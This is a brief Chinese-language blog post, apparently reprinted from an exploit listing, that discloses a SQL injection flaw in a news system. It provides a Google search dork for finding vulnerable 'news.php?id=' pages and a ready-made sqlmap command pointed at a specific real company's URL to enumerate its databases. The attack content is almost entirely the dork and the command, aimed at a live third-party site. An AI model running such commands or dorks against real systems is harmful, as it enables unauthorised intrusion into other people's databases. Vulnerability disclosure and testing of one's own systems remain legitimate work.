深入解析cmkoo新闻系统SQL注入漏洞

本文详细披露了cmkoo网站新闻系统存在的SQL注入漏洞,提供了漏洞利用的具体方法与谷歌搜索语法,并展示了使用sqlmap自动化工具进行数据库枚举的实战命令。

cmkoo - SQL注入

发布日期: 2025.12.21 漏洞提交者: javad rashidi 风险等级: 中等 攻击类型: 远程 CVE编号: 暂无 CWE编号: 暂无 谷歌搜索语法: inurl:"news.php?id="

漏洞详情

  • 漏洞标题: cmkoo - SQL注入
  • 发现日期: 2025年12月18日
  • 漏洞作者: javad rashidi
  • 测试环境: Windows, Linux
  • 谷歌搜索语法: inurl:"news.php?id="

漏洞利用方法

可使用自动化渗透测试工具 sqlmap 进行验证与利用。

具体命令如下:

1

sqlmap -u "http://www.cmkoo.com.hk/en/news/news.php?id=28" --dbs

此命令将针对目标URL进行测试,并尝试枚举出后端数据库的名称。

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次